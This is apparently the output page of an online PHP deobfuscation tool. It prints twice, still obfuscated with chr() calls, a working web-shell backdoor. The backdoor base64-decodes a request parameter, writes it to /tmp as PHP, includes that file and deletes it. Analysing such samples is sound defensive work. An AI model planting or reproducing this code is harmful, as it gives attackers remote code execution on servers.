Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$b = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).c..

Decoded Output download

<?  $b = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$c = $_REQUEST[\"d1\"];$c1 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(47).chr(116).chr(109).chr(112).chr(47).chr(102).chr(103).chr(100).chr(102).chr(103).chr(100).chr(102).chr(103);$d1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$f = chr(117).chr(110).chr(108).chr(105).chr(110).chr(107);$c1($d,$d1.$b($c));include($d);$f($d); ?>

Did this file decode correctly?

Original Code

$b = chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$c = $_REQUEST[\"d1\"];$c1 = chr(102).chr(105).chr(108).chr(101).chr(95).chr(112).chr(117).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115);$d = chr(47).chr(116).chr(109).chr(112).chr(47).chr(102).chr(103).chr(100).chr(102).chr(103).chr(100).chr(102).chr(103);$d1 = chr(60).chr(63).chr(112).chr(104).chr(112).chr(32);$f = chr(117).chr(110).chr(108).chr(105).chr(110).chr(107);$c1($d,$d1.$b($c));include($d);$f($d);

Function Calls

None

Variables

None

Stats

MD5 35cd4f70aeaa1b47a7e735d4c6fe76fd
Eval Count 0
Decode Time 98 ms